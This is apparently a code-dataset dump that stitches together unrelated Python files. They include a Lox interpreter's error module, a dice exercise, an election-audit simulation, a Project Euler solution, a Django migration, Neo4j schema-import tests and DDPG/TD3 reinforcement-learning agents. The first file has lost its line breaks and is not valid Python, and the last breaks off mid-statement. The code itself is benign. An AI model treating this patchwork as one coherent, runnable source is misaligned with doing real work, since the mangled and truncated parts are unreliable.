from __future__ import annotations import enum import inspect import sys import typing as tp import pylox.misc_utils as mu import pylox.token_classes as tc DEFAULT_ERROR = "Something very wrong has happened" ErrorLine = tp.Union[int, str] class ReturnsNT(tp.NamedTuple): code: int type: str class ErrorReturns(ReturnsNT, enum.Enum): SUCCESS = ReturnsNT(0, "Success") ERROR = ReturnsNT(70, "Error") SCAN_ERROR = PARSE_ERROR = RESOLVER_ERROR = ReturnsNT(65, "Syntax Error") FILE_ERROR = ReturnsNT(66, "File Error") RUNTIME_ERROR = ReturnsNT(70, "Runtime Error") def error(self) -> bool: return self is not self.SUCCESS # TODO: Refactor global state out? # This is meant to incremented when a line goes past when dealing with # multiple pieces of source code (e.g in the REPL) line_inc = 0 def error( line: ErrorLine, message: str = DEFAULT_ERROR, error_type: ErrorReturns = ErrorReturns.ERROR, *, raw_line: bool = False, ) -> None: if isinstance(line, int): line += line_inc elif not raw_line: line += f" (after line {line_inc})" print(f"[line: {line}] {error_type.value.type}: {message}", file=sys.stderr) def token_line(mixed_tokens: tp.Iterable[tp.Any]) -> int: """ Helper function for getting the line from a list of of mixed tokens. """ def process_key(key: tp.Any) -> int: if isinstance(key, tc.Token): return key.line try: return token_line(key) except TypeError: return 0 return max(mixed_tokens, key=process_key, default=0) def keyboard_interrupt_error( error_type: ErrorReturns, line: tp.Optional[ErrorLine] = None ) -> None: raw_line = True if line is None: line = f"estimate {token_line(inspect.trace()[-1][0].f_locals.values())}" elif line == 0: line = "unknown" raw_line = False print() error(line, "Keyboard Interrupt", error_type, raw_line=raw_line) class LoxRuntimeError(Exception): """ Always caught """ line: ErrorLine message: str ignore: bool def __init__( self, line: ErrorLine = "unknown", message: str = DEFAULT_ERROR, ignore: bool = False, ) -> None: self.line = line or "unknown" self.message = message self.ignore = ignore def error(self) -> None: if not self.ignore: error(self.line, self.message, ErrorReturns.RUNTIME_ERROR) class KeyLoxRuntimeError(LoxRuntimeError, KeyError): """ Subclass of LoxRuntimeError meant for use where it should be able to be caught as a KeyError """
2.53125
3
month01/all_code/day07/exercise06.py
chaofan-zheng/tedu-python-demo
4
12789680
<filename>month01/all_code/day07/exercise06.py """ 练习1:请排列出两个色子可以组成的所有可能(列表) 练习2:请排列出三个色子可以组成的所有可能(列表) 色子1~6 range(1,7) 色子1~6 range(1,7) """ # list_result = [] # for x in range(1,7): # for y in range(1,7): # list_result.append((x,y)) # list_result = [(x, y) for x in range(1, 7) for y in range(1, 7)] # list_result = [] # for x in range(1,7):# 1 # for y in range(1,7):# 1 2 3 ... 6 # for z in range(1,7):#1~6 1~6 1~6 # list_result.append((x,y,z)) list_result = [(x, y, z) for x in range(1, 7) for y in range(1, 7) for z in range(1, 7)] print(list_result)
3.8125
4
src/wai/annotations/core/stream/__init__.py
waikato-ufdl/wai-annotations-core
0
12789681
""" Package for base stream-processing classes. """ from ._Pipeline import Pipeline from ._StreamProcessor import StreamProcessor, InputElementType, OutputElementType from ._StreamSink import StreamSink from ._StreamSource import StreamSource from ._typing import ThenFunction, DoneFunction, ElementType
1.242188
1
maine-rcv-code/v1-ballot-list-based/audit_me.py
Dovermore/2018-rcv-audits
1
12789682
<reponame>Dovermore/2018-rcv-audits # audit_me.py # <NAME> # September 26, 2018 """ Code to simulate auditing of ME RCV contest. """ from consistent_sampler import sampler import hashlib import rcv hash_count = 0 def randint(a, b): """ Return pseudorandom between a (inclusive) and b (exclusive) """ global hash_count assert a<b hash_input = str(hash_count) x = hashlib.sha256(str(hash_input).encode('utf-8')).hexdigest() x = int(x, 16) x = a + x % (b-a) return x def get_data(): votes_dir = "../../maine-rcv-data/" votes_filename = votes_dir + 'me_votes.csv' L = rcv.read_ME_data(votes_filename, True) return L def audit(): L = get_data() n = len(L) sample_order = list(sampler(range(n), with_replacement=False, output='id', seed=1)) print("Sample order[:50]:", sample_order[:50]) n_stages=50 for stage in range(1, n_stages+1): print("Audit stage: {} ".format(stage), end='') s = min(n, stage*50) # for efficiency S = [L[sample_order[i]] for i in range(s)] # want to do this part many times, to get win frequency for i in range(s, s*10): S.append(S[randint(0, i)]) w = rcv.rcv_winner(S, [], printing_wanted=False) print("Winner:", w) import cProfile cProfile.run('audit()')
2.6875
3
Problems_1_to_100/Problem_21/problem_21.py
ikostan/ProjectEuler
1
12789683
#!/usr/bin/python import time from utils.utils import print_time_log def sum_of_proper_divisors(number: int): """ Let d(n) be defined as the sum of proper divisors of n (numbers less than n which divide evenly into n). :param number: :return: """ divisors = [] for n in range(1, number): if number % n == 0: divisors.append(n) return sum(divisors) def sum_of_amicable_numbers(number: int): """ Evaluate the sum of all the amicable numbers under -> number :param number: :return: """ start_time = time.time() amicable = set() for n in range(1, number): if n not in amicable: a = sum_of_proper_divisors(n) b = sum_of_proper_divisors(a) if (n == b) and not (n == b == a): amicable.add(n) amicable.add(a) result = sum(amicable) print_time_log(start_time, result) return result
3.90625
4
resumes/migrations/0005_contactdetails_address_2.py
USUDR2604/Django-ResumeBuilder
0
12789684
# Generated by Django 3.2.5 on 2021-07-12 05:10 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('resumes', '0004_remove_contactdetails_address_2'), ] operations = [ migrations.AddField( model_name='contactdetails', name='Address_2', field=models.CharField(default='India', help_text='Enter your Address', max_length=800), ), ]
1.679688
2
tests/test_neoschema_data_import.py
BrainAnnex/brain-annex
0
12789685
<reponame>BrainAnnex/brain-annex # Testing of Schema-based Data Import # *** CAUTION! *** The database gets cleared out during some of the tests! # NOTES: - some tests require APOC # - some tests may fail their date check if done close to midnight, server time import pytest from BrainAnnex.modules.neo_access import neo_access from BrainAnnex.modules.utilities.comparisons import compare_recordsets from BrainAnnex.modules.neo_schema.neo_schema import NeoSchema from tests.test_neoschema import create_sample_schema_1, create_sample_schema_2 # Provide a database connection that can be used by the various tests that need it @pytest.fixture(scope="module") def db(): neo_obj = neo_access.NeoAccess(debug=False) NeoSchema.set_database(neo_obj) yield neo_obj def test_create_data_nodes_from_python_data_1(db): db.empty_dbase() # Set up the Schema sch_1 = NeoSchema.new_class_with_properties(class_name="Import Data", property_list=["source", "date"]) sch_2 = NeoSchema.new_class_with_properties(class_name="my_class_1", property_list=["legit", "other"]) NeoSchema.create_class_relationship(from_id=sch_1, to_id=sch_2, rel_name="imported_data") # 1-layer dictionary, with a key in the Schema and one not data = {"legit": 123, "unexpected": 456} # Import step node_id_list = NeoSchema.create_data_nodes_from_python_data(data, class_name="my_class_1") assert len(node_id_list) == 1 root_id = node_id_list[0] q = ''' MATCH (c1:CLASS {name:"Import Data"})<-[:SCHEMA]- (n1:`Import Data`)-[:imported_data]->(n2:my_class_1) -[:SCHEMA]->(c2:CLASS {name:"my_class_1"}) WHERE id(n2) = $item_id RETURN n2 ''' root_node = db.query(q, data_binding={"item_id": root_id}, single_row=True) root_record = root_node["n2"] assert root_record["legit"] == 123 assert "item_id" in root_record assert "unexpected" not in root_record # Only the key in the Schema gets imported def test_create_data_nodes_from_python_data_2(db): db.empty_dbase() # Set up the Schema. Nothing in it yet, other than the "Import Data" node NeoSchema.new_class_with_properties(class_name="Import Data", property_list=["source", "date"]) data = {"arbitrary": "Doesn't matter"} # Import step with pytest.raises(Exception): NeoSchema.create_data_nodes_from_python_data(data, class_name="non_existent_class") # Even though the import got aborted and raised an Exception, the `Import Data` is left behind; # locate it by its date stamp q = ''' MATCH (n:`Import Data` {date: date()}) RETURN n ''' result = db.query(q) assert len(result) == 1 def test_create_data_nodes_from_python_data_3(db): db.empty_dbase() # Set up Schema that only contains parts of the attributes in the data - and lacks the "result" relationship sch_1 = NeoSchema.new_class_with_properties(class_name="Import Data", property_list=["source", "date"]) sch_2 = NeoSchema.new_class_with_properties(class_name="patient", property_list=["age", "balance"]) NeoSchema.create_class_relationship(from_id=sch_1, to_id=sch_2, rel_name="imported_data") data = { "name": "Stephanie", "age": 23, "referred by": None, "result": { "biomarker": "insulin", "value": 123. }, "balance": 150.25, "extraneous": "I don't belong", "insurance": False } # Import node_id_list = NeoSchema.create_data_nodes_from_python_data(data, class_name="patient") assert len(node_id_list) == 1 root_id = node_id_list[0] q = ''' MATCH (c1:CLASS {name:"Import Data"})<-[:SCHEMA]- (n1:`Import Data`)-[:imported_data]->(n2:patient) -[:SCHEMA]->(c2:CLASS {name:"patient"}) WHERE id(n2) = $item_id RETURN n2 ''' root_node = db.query(q, data_binding={"item_id": root_id}, single_row=True) # Only the keys in the Schema gets imported; the relationship "result" is not in the Schema, either root_record = root_node["n2"] assert root_record["age"] == 23 assert root_record["balance"] == 150.25 assert "item_id" in root_record assert len(root_record) == 3 # Only the keys in the Schema gets imported q = '''MATCH (n:patient)-[:result]-(m) RETURN n, m''' res = db.query(q) assert len(res) == 0 # "result" is not in the Schema def test_create_data_nodes_from_python_data_4(db): db.empty_dbase() sch_info = create_sample_schema_1() # Schema with patient/result/doctor # Add to the Schema the "Import Data" node, and a link to the Class of the import's root sch_import = NeoSchema.new_class_with_properties(class_name="Import Data", property_list=["source", "date"]) NeoSchema.create_class_relationship(from_id=sch_import, to_id=sch_info["patient"], rel_name="imported_data") data = { "name": "Stephanie", "age": 23, "referred by": None, "result": { # Note: this doesn't match the "HAS_RESULT" in the Schema "biomarker": "insulin", "value": 123. }, "balance": 150.25, "extraneous": "I don't belong", "insurance": False } # Import node_id_list = NeoSchema.create_data_nodes_from_python_data(data, class_name="patient") assert len(node_id_list) == 1 root_id = node_id_list[0] q = ''' MATCH (c1:CLASS {name:"Import Data"})<-[:SCHEMA]- (n1:`Import Data`)-[:imported_data]->(n2:patient) -[:SCHEMA]->(c2:CLASS {name:"patient"}) WHERE id(n2) = $root_id RETURN n2 ''' root_node = db.query(q, data_binding={"root_id": root_id}, single_row=True) # Only the keys in the Schema gets imported; the relationship "result" is not in the Schema, either root_record = root_node["n2"] assert root_record["name"] == "Stephanie" assert root_record["age"] == 23 assert root_record["balance"] == 150.25 assert "item_id" in root_record assert len(root_record) == 4 # Only the keys in the Schema gets imported q = '''MATCH (n:patient)-[:result]-(m) RETURN n, m''' res = db.query(q) assert len(res) == 0 # the relationship "result" is not in the Schema # Count the links from the "patient" data node (the root) assert db.count_links(match=root_id, rel_name="SCHEMA", rel_dir="OUT", neighbor_labels="CLASS") == 1 assert db.count_links(match=root_id, rel_name="imported_data", rel_dir="IN", neighbor_labels="Import Data") == 1 assert db.count_links(match=root_id, rel_name="result", rel_dir="BOTH") == 0 def test_create_data_nodes_from_python_data_5(db): db.empty_dbase() sch_info = create_sample_schema_1() # Schema with patient/result/doctor # Add to the Schema the "Import Data" node, and a link to the Class of the import's root sch_import = NeoSchema.new_class_with_properties(class_name="Import Data", property_list=["source", "date"]) NeoSchema.create_class_relationship(from_id=sch_import, to_id=sch_info["patient"], rel_name="imported_data") data = { "name": "Stephanie", "age": 23, "referred by": None, "HAS_RESULT": { "biomarker": "insulin", "value": 123., "intruder": "the schema doesn't know me" }, "balance": 150.25, "extraneous": "I don't belong", "WRONG_LINK_TO_DOCTOR" : { "name": "Dr. Kane", "hospital": "Mt. Zion", "specialty": "OB/GYN" }, "insurance": False } # Import node_id_list = NeoSchema.create_data_nodes_from_python_data(data, class_name="patient") assert len(node_id_list) == 1 root_id = node_id_list[0] # Traverse a loop in the graph, from the patient data node, back to itself, # and finally to the `Import Data` node - going thru data and schema nodes q = ''' MATCH (p:patient {name: "Stephanie", age: 23, balance: 150.25})-[:HAS_RESULT]-> (r:result {biomarker:"insulin", value: 123.0})-[:SCHEMA]->(cl_r:CLASS {name:"result"}) <-[:HAS_RESULT]-(cl_p:CLASS {name:"patient"})<-[:SCHEMA]-(p)<-[:imported_data]-(i: `Import Data`) WHERE i.date = date() AND id(p) = $root_id RETURN p, r, cl_r, cl_p, i ''' result = db.query(q, data_binding={"root_id": root_id}) #print(result) # Only the keys in the Schema gets imported; the relationship "HAS_RESULT" is in the Schema assert len(result) == 1 # The relationship "WRONG_LINK_TO_DOCTOR" is not in the Schema q = '''MATCH (n:patient)-[:WRONG_LINK_TO_DOCTOR]-(m) RETURN n, m''' result = db.query(q) assert len(result) == 0 # Count the links from the "patient" data node (the root) assert db.count_links(match=root_id, rel_name="HAS_RESULT", rel_dir="OUT", neighbor_labels="result") == 1 assert db.count_links(match=root_id, rel_name="SCHEMA", rel_dir="OUT", neighbor_labels="CLASS") == 1 assert db.count_links(match=root_id, rel_name="imported_data", rel_dir="IN", neighbor_labels="Import Data") == 1 assert db.count_links(match=root_id, rel_name="WRONG_LINK_TO_DOCTOR", rel_dir="BOTH") == 0 # Locate the "result" data node, and count the links in/out of it match = db.find(labels="result") assert db.count_links(match=match, rel_name="HAS_RESULT", rel_dir="IN", neighbor_labels="patient") == 1 assert db.count_links(match=match, rel_name="SCHEMA", rel_dir="OUT", neighbor_labels="CLASS") == 1 def test_create_data_nodes_from_python_data_6(db): db.empty_dbase() sch_info = create_sample_schema_1() # Schema with patient/result/doctor # Add to the Schema the "Import Data" node, and a link to the Class of the import's root sch_import = NeoSchema.new_class_with_properties(class_name="Import Data", property_list=["source", "date"]) NeoSchema.create_class_relationship(from_id=sch_import, to_id=sch_info["patient"], rel_name="imported_data") data = { "name": "Stephanie", "age": 23, "referred by": None, "HAS_RESULT": { "biomarker": "insulin", "value": 123., "intruder": "the schema doesn't know me" }, "balance": 150.25, "extraneous": "I don't belong", "IS_ATTENDED_BY" : { "name": "Dr. Kane", "hospital": "Mt. Zion", "specialty": "OB/GYN" }, "insurance": False } # Import node_id_list = NeoSchema.create_data_nodes_from_python_data(data, class_name="patient") assert len(node_id_list) == 1 root_id = node_id_list[0] # Traverse a loop in the graph, from the patient data node, back to itself, # and finally to the `Import Data` node - going thru data and schema nodes q = ''' MATCH (p:patient {name: "Stephanie", age: 23, balance: 150.25})-[:HAS_RESULT]-> (r:result {biomarker:"insulin", value: 123.0})-[:SCHEMA]->(cl_r:CLASS {name:"result"}) <-[:HAS_RESULT]-(cl_p:CLASS {name:"patient"})<-[:SCHEMA]-(p)<-[:imported_data]-(i: `Import Data`) WHERE i.date = date() AND id(p) = $root_id RETURN p, r, cl_r, cl_p, i ''' result = db.query(q, data_binding={"root_id": root_id}) #print(result) assert len(result) == 1 # Again, traverse a loop in the graph, from the patient data node, back to itself, # but this time going thru the `doctor` data and schema nodes q = ''' MATCH (p:patient {name: "Stephanie", age: 23, balance: 150.25})-[:IS_ATTENDED_BY]-> (d:doctor {name:"Dr. Kane", specialty: "OB/GYN"})-[:SCHEMA]->(cl_d:CLASS {name:"doctor"}) <-[:IS_ATTENDED_BY]-(cl_p:CLASS {name:"patient"})<-[:SCHEMA]-(p) WHERE id(p) = $root_id RETURN p, d, cl_d, cl_p ''' result = db.query(q, data_binding={"root_id": root_id}) #print(result) assert len(result) == 1 # Count the links from the "patient" data node (the root) assert db.count_links(match=root_id, rel_name="HAS_RESULT", rel_dir="OUT", neighbor_labels="result") == 1 assert db.count_links(match=root_id, rel_name="IS_ATTENDED_BY", rel_dir="OUT", neighbor_labels="doctor") == 1 assert db.count_links(match=root_id, rel_name="SCHEMA", rel_dir="OUT", neighbor_labels="CLASS") == 1 assert db.count_links(match=root_id, rel_name="imported_data", rel_dir="IN", neighbor_labels="Import Data") == 1 # Locate the "result" data node, and count the links in/out of it match = db.find(labels="result") assert db.count_links(match=match, rel_name="HAS_RESULT", rel_dir="IN", neighbor_labels="patient") == 1 assert db.count_links(match=match, rel_name="SCHEMA", rel_dir="OUT", neighbor_labels="CLASS") == 1 # Locate the "doctor" data node, and count the links in/out of it match = db.find(labels="doctor") assert db.count_links(match=match, rel_name="IS_ATTENDED_BY", rel_dir="IN", neighbor_labels="patient") == 1 assert db.count_links(match=match, rel_name="SCHEMA", rel_dir="OUT", neighbor_labels="CLASS") == 1 # Locate the "Import Data" data node, and count the links in/out of it match = db.find(labels="Import Data") assert db.count_links(match=match, rel_name="imported_data", rel_dir="OUT", neighbor_labels="patient") == 1 assert db.count_links(match=match, rel_name="SCHEMA", rel_dir="OUT", neighbor_labels="CLASS") == 1 def test_create_data_nodes_from_python_data_7(db): db.empty_dbase() sch_info = create_sample_schema_2() # Class "quotes" with relationship "in_category" to class "Categories" # Add to the Schema the "Import Data" node, and a link to the Class of the import's root sch_import = NeoSchema.new_class_with_properties(class_name="Import Data", property_list=["source", "date"]) NeoSchema.create_class_relationship(from_id=sch_import, to_id=sch_info["quotes"], rel_name="imported_data") data = [ { "quote": "I wasn't kissing her. I was whispering in her mouth", "attribution": "<NAME>" } ] # Import node_id_list = NeoSchema.create_data_nodes_from_python_data(data, class_name="quotes") print("node_id_list: ", node_id_list) assert len(node_id_list) == 1 root_id = node_id_list[0] # Traverse a loop in the graph, from the `quotes` data node, back to itself, # going thru the data and schema nodes q = ''' MATCH (q :quotes {attribution: "<NAME>", quote: "I wasn't kissing her. I was whispering in her mouth"}) -[:SCHEMA]->(cl_q :CLASS {name:"quotes"}) <-[:imported_data]-(cl_i :CLASS {name:"Import Data"})<-[:SCHEMA]-(i: `Import Data`) -[:imported_data]->(q) WHERE i.date = date() AND id(q) = $quote_id RETURN q, cl_q, cl_i ''' result = db.query(q, data_binding={"quote_id": root_id}) #print(result) assert len(result) == 1 # Locate the "Import Data" data node, and count the links in/out of it match = db.find(labels="Import Data") assert db.count_links(match=match, rel_name="imported_data", rel_dir="OUT", neighbor_labels="quotes") == 1 assert db.count_links(match=match, rel_name="SCHEMA", rel_dir="OUT", neighbor_labels="CLASS") == 1 # Locate the "quotes" data node (the root), and count the links in/out of it assert db.count_links(match=root_id, rel_name="SCHEMA", rel_dir="OUT", neighbor_labels="CLASS") == 1 assert db.count_links(match=root_id, rel_name="imported_data", rel_dir="IN", neighbor_labels="Import Data") == 1 def test_create_data_nodes_from_python_data_8(db): # Similar to test_create_data_nodes_from_python_data_8, but importing 2 quotes instead of 1, # and introducing non-Schema data db.empty_dbase() sch_info = create_sample_schema_2() # Class "quotes" with relationship "in_category" to class "Categories" # Add to the Schema the "Import Data" node, and a link to the Class of the import's root sch_import = NeoSchema.new_class_with_properties(class_name="Import Data", property_list=["source", "date"]) NeoSchema.create_class_relationship(from_id=sch_import, to_id=sch_info["quotes"], rel_name="imported_data") data = [ { "quote": "I wasn't kissing her. I was whispering in her mouth", "attribution": "<NAME>" }, { "quote": "Inspiration exists, but it has to find us working", "attribution": "<NAME>", "extraneous": "I don't belong in the Schema" }, { "junk": "This whole record has no place in the Schema" } ] # Import node_id_list = NeoSchema.create_data_nodes_from_python_data(data, class_name="quotes") print("node_id_list: ", node_id_list) assert len(node_id_list) == 2 # Locate the "Import Data" data node match = db.find(labels="Import Data") assert db.count_links(match=match, rel_name="imported_data", rel_dir="OUT", neighbor_labels="quotes") == 2 assert db.count_links(match=match, rel_name="SCHEMA", rel_dir="OUT", neighbor_labels="CLASS") == 1 for root_id in node_id_list: # Traverse a loop in the graph, from the `quotes` data node, back to itself, # going thru the data and schema nodes q = ''' MATCH (q :quotes) -[:SCHEMA]->(cl_q :CLASS {name:"quotes"}) <-[:imported_data]-(cl_i :CLASS {name:"Import Data"})<-[:SCHEMA]-(i: `Import Data`) -[:imported_data]->(q) WHERE i.date = date() AND id(q) = $quote_id RETURN q, cl_q, cl_i ''' result = db.query(q, data_binding={"quote_id": root_id}) print(result) assert len(result) == 1 # Locate the "quotes" data node, and count the links in/out of it assert db.count_links(match=root_id, rel_name="SCHEMA", rel_dir="OUT", neighbor_labels="CLASS") == 1 assert db.count_links(match=root_id, rel_name="imported_data", rel_dir="IN", neighbor_labels="Import Data") == 1 def test_create_data_nodes_from_python_data_9(db): # Similar to test_create_data_nodes_from_python_data_8, but also using the class "Categories" db.empty_dbase() sch_info = create_sample_schema_2() # Class "quotes" with relationship "in_category" to class "Categories" # Add to the Schema the "Import Data" node, and a link to the Class of the import's root sch_import = NeoSchema.new_class_with_properties(class_name="Import Data", property_list=["source", "date"]) NeoSchema.create_class_relationship(from_id=sch_import, to_id=sch_info["quotes"], rel_name="imported_data") data = [ { "quote": "I wasn't kissing her. I was whispering in her mouth", "attribution": "<NAME>", "in_category": { "name": "Literature", "remarks": "English only", "junk": "trying to sneak in" } }, { "quote": "Inspiration exists, but it has to find us working", "attribution": "<NAME>", "in_category": { "name": "Famous Quotes" } } ] # Import node_id_list = NeoSchema.create_data_nodes_from_python_data(data, class_name="quotes") print("node_id_list: ", node_id_list) assert len(node_id_list) == 2 # Locate the "Import Data" data node match = db.find(labels="Import Data") assert db.count_links(match=match, rel_name="imported_data", rel_dir="OUT", neighbor_labels="quotes") == 2 assert db.count_links(match=match, rel_name="SCHEMA", rel_dir="OUT", neighbor_labels="CLASS") == 1 for root_id in node_id_list: # Locate the "quotes" data node, and count the links in/out of it assert db.count_links(match=root_id, rel_name="SCHEMA", rel_dir="OUT", neighbor_labels="CLASS") == 1 assert db.count_links(match=root_id, rel_name="imported_data", rel_dir="IN", neighbor_labels="Import Data") == 1 assert db.count_links(match=root_id, rel_name="in_category", rel_dir="OUT", neighbor_labels="Categories") == 1 # Traverse a loop in the graph, from the `quotes` data node, back to itself, # going thru the data and schema nodes q = ''' MATCH (q :quotes) -[:SCHEMA]->(cl_q :CLASS {name:"quotes"}) <-[:imported_data]-(cl_i :CLASS {name:"Import Data"})<-[:SCHEMA]-(i: `Import Data`) -[:imported_data]->(q) WHERE i.date = date() AND id(q) = $quote_id RETURN q, cl_q, cl_i ''' result = db.query(q, data_binding={"quote_id": root_id}) #print(result) assert len(result) == 1 # Traverse a longer loop in the graph, again from the `quotes` data node to itself, # but this time also passing thru the category data and schema nodes q = ''' MATCH (q :quotes)-[:in_category]->(cat :Categories) -[:SCHEMA]->(cl_c :CLASS {name:"Categories"})<-[:in_category]- (cl_q :CLASS {name:"quotes"}) <-[:imported_data]-(cl_i :CLASS {name:"Import Data"})<-[:SCHEMA]-(i: `Import Data`) -[:imported_data]->(q) WHERE i.date = date() AND id(q) = $quote_id RETURN q, cat, cl_q, cl_i ''' result = db.query(q, data_binding={"quote_id": root_id}) #print(result) assert len(result) == 1 record = result[0] author = record["q"]["attribution"] assert author == '<NAME>' or author == '<NAME>' if author == '<NAME>': assert record["cat"]["name"] == "Literature" assert record["q"]["quote"] == "I wasn't kissing her. I was whispering in her mouth" else: assert record["cat"]["name"] == "Famous Quotes" assert record["q"]["quote"] == "Inspiration exists, but it has to find us working" # END of for loop # Add an extra quote, connected to 2 categories data = { "quote": "My destination is no longer a place, rather a new way of seeing", "attribution": "Proust", "in_category": [ { "name": "French Literature" } , { "name": "Philosophy" } ], "verified": False } # Import new_node_id_list = NeoSchema.create_data_nodes_from_python_data(data, class_name="quotes") #print("new_node_id_list: ", new_node_id_list) assert len(new_node_id_list) == 1 new_root_id = new_node_id_list[0] # Locate the latest "quotes" data node, and count the links in/out of it assert db.count_links(match=new_root_id, rel_name="imported_data", rel_dir="IN", neighbor_labels="Import Data") == 1 assert db.count_links(match=new_root_id, rel_name="in_category", rel_dir="OUT", neighbor_labels="Categories") == 2 assert db.count_links(match=new_root_id, rel_name="SCHEMA", rel_dir="OUT", neighbor_labels="CLASS") == 1 # Traverse a loop in the graph, from the `quotes` data node back to itself, # going thru the 2 category data nodes and their shared Schema node q = ''' MATCH (q :quotes)-[:in_category]->(cat1 :Categories {name: "French Literature"}) -[:SCHEMA]->(cl_c :CLASS {name:"Categories"}) <-[:SCHEMA]-(cat2 :Categories {name: "Philosophy"}) <-[:in_category]-(q) WHERE id(q) = $quote_id RETURN q, cat1, cl_c, cat2 ''' result = db.query(q, data_binding={"quote_id": new_root_id}) #print(result) assert len(result) == 1 record = result[0] assert record["q"]["attribution"] == "Proust" assert record["q"]["quote"] == "My destination is no longer a place, rather a new way of seeing" assert record["q"]["verified"] == False # Locate the data node for the Class "Import Data", and count the links in/out of it match = db.find(labels="CLASS", key_name="name", key_value="Import Data") assert db.count_links(match=match, rel_name="SCHEMA", rel_dir="IN", neighbor_labels="Import Data") == 2 assert db.count_links(match=match, rel_name="imported_data", rel_dir="OUT", neighbor_labels="CLASS") == 1 # Verify the data types q = ''' MATCH (n) WHERE id(n) = $quote_id RETURN apoc.meta.cypher.types(n) AS data_types ''' data_types = db.query(q, data_binding={"quote_id": new_root_id}, single_cell="data_types") #print(data_types) assert data_types == {'verified': 'BOOLEAN', 'attribution': 'STRING', 'quote': 'STRING', 'item_id': 'INTEGER'}
2.234375
2
rl/agents/ddpg.py
KNakane/tensorflow
1
12789686
# -*- coding: utf-8 -*- import os,sys sys.path.append(os.path.join(os.path.dirname(__file__), '../../utility')) sys.path.append(os.path.join(os.path.dirname(__file__), '../../network')) import numpy as np import tensorflow as tf from agent import Agent from eager_nn import ActorNet, CriticNet from optimizer import * from OU_noise import OrnsteinUhlenbeckProcess class DDPG(Agent): def __init__(self, *args, **kwargs): self.max_action = kwargs.pop('max_action') super().__init__(*args, **kwargs) self.noise = OrnsteinUhlenbeckProcess(num_actions=self.n_actions) self.tau = 0.01 if self.is_categorical: self.Vmax, self.Vmin = 10.0, -10.0 self.delta_z = tf.lin_space(self.Vmin, self.Vmax, self.critic.N_atoms) """ self.delta_z = (self.Vmax - self.Vmin) / (self.q_eval.N_atoms - 1) self.z_list = tf.constant([self.Vmin + i * self.delta_z for i in range(self.critic.N_atoms)],dtype=tf.float32) self.z_list_broadcasted = tf.tile(tf.reshape(self.z_list,[1,self.q_eval.N_atoms]), tf.constant([self.n_actions,1])) """ def _build_net(self): self.actor = ActorNet(model=self.model[0], out_dim=self.n_actions, name='ActorNet', opt=self._optimizer, lr=self.lr, trainable=self.trainable, max_action=self.max_action) self.actor_target = ActorNet(model=self.model[0], out_dim=self.n_actions, name='ActorNet_target', trainable=False, max_action=self.max_action) self.critic = CriticNet(model=self.model[1], out_dim=1, name='CriticNet', opt=self._optimizer, lr=self.lr, trainable=self.trainable) self.critic_target = CriticNet(model=self.model[1], out_dim=1, name='CriticNet_target',trainable=False) @tf.contrib.eager.defun def inference(self, state): return self.actor.inference(state) def choose_action(self, observation): observation = observation[np.newaxis, :] action = self.inference(observation) + np.expand_dims(self.noise.generate(),axis=0) return np.array(action[0]) def test_choose_action(self, observation): observation = observation[np.newaxis, :] action = self.inference(observation) return np.array(action[0]) def update_q_net(self, replay_data, weights): bs, ba, done, bs_, br, p_idx = replay_data self.bs = np.array(bs, dtype=np.float32) bs_ = np.array(bs_, dtype=np.float32) eval_act_index = np.reshape(ba,(self.batch_size, self.n_actions)) reward = np.reshape(np.array(br, dtype=np.float32),(self.batch_size,1)) done = np.reshape(np.array(done, dtype=np.float32),(self.batch_size,1)) p_idx = np.reshape(p_idx,(self.batch_size,1)) return self._train_body(self.bs, eval_act_index, done, bs_, reward, p_idx, weights) @tf.contrib.eager.defun def _train_body(self, bs, eval_act_index, done, bs_, reward, p_idx, weights): global_step = tf.train.get_or_create_global_step() # update critic_net with tf.device(self.device): with tf.GradientTape() as tape: if self.is_categorical: pass else: critic_next, critic_eval = self.critic_target.inference([bs_, self.actor_target.inference(bs_)]), self.critic.inference([bs, eval_act_index]) target_Q = reward + self.discount ** tf.cast(p_idx, tf.float32) * critic_next * (1. - done) target_Q = tf.stop_gradient(target_Q) # ↓critic_loss error = tf.losses.huber_loss(labels=target_Q, predictions=critic_eval) td_error = tf.abs(tf.reduce_mean(target_Q - critic_eval, axis=1)) critic_loss = tf.reduce_mean(error * weights, keepdims=True) self.critic.optimize(critic_loss, global_step, tape) # update actor_net with tf.GradientTape() as tape: actor_eval = tf.cast(self.actor.inference(bs), tf.float32) actor_loss = -tf.reduce_mean(self.critic.inference([bs, actor_eval])) self.actor.optimize(actor_loss, global_step, tape) # check to replace target parameters self.update_target_net() return [critic_loss, actor_loss], td_error def update_target_net(self): # update critic_target_net for param, target_param in zip(self.critic.weights, self.critic_target.weights): target_param.assign(self.tau * param + (1 - self.tau) * target_param) # update actor_target_net for param, target_param in zip(self.actor.weights, self.actor_target.weights): target_param.assign(self.tau * param + (1 - self.tau) * target_param) return class TD3(Agent): def __init__(self, *args, **kwargs): self.max_action = kwargs.pop('max_action') super().__init__(*args, **kwargs) self.noise = OrnsteinUhlenbeckProcess(num_actions=self.n_actions) self.tau = 0.01 self.policy_freq = 2 def _build_net(self): self.actor = ActorNet(model=self.model[0], out_dim=self.n_actions, name='ActorNet', opt=self._optimizer, lr=self.lr, trainable=True, max_action=self.max_action) self.actor_target = ActorNet(model=self.model[0], out_dim=self.n_actions, name='ActorNet_target', trainable=False, max_action=self.max_action) self.critic1 = CriticNet(model=self.model[1], out_dim=1, name='CriticNet1', opt=self._optimizer, lr=self.lr, trainable=True) self.critic2 = CriticNet(model=self.model[1], out_dim=1, name='CriticNet2', opt=self._optimizer, lr=self.lr, trainable=True) self.critic_target1 = CriticNet(model=self.model[1], out_dim=1, name='CriticNet_target1',trainable=False) self.critic_target2 = CriticNet(model=self.model[1], out_dim=1, name='CriticNet_target2',trainable=False) @tf.contrib.eager.defun def inference(self, state): return self.actor.inference(state) def choose_action(self, observation): observation = observation[np.newaxis, :] action = self.inference(observation) + np.expand_dims(self.noise.generate(),axis=0) return np.array(action[0]) def test_choose_action(self, observation): observation = observation[np.newaxis, :] action = self.inference(observation) return np.array(action[0]) def update_q_net(self, replay_data, weights): bs, ba, done, bs_, br, p_idx = replay_data self.bs = np.array(bs, dtype=np.float32) bs_ = np.array(bs_, dtype=np.float32) eval_act_index = np.reshape(ba,(self.batch_size, self.n_actions)) reward = np.reshape(np.array(br, dtype=np.float32),(self.batch_size,1)) done = np.reshape(np.array(done, dtype=np.float32),(self.batch_size,1)) p_idx = np.reshape(p_idx,(self.batch_size,1)) critic_loss1, critic_loss2, td_error = self._train_critic(self.bs, eval_act_index, done, bs_, reward, p_idx, weights) if self._iteration % self.policy_freq == 0: self.actor_loss = self._train_actor(self.bs) self._iteration += 1 return 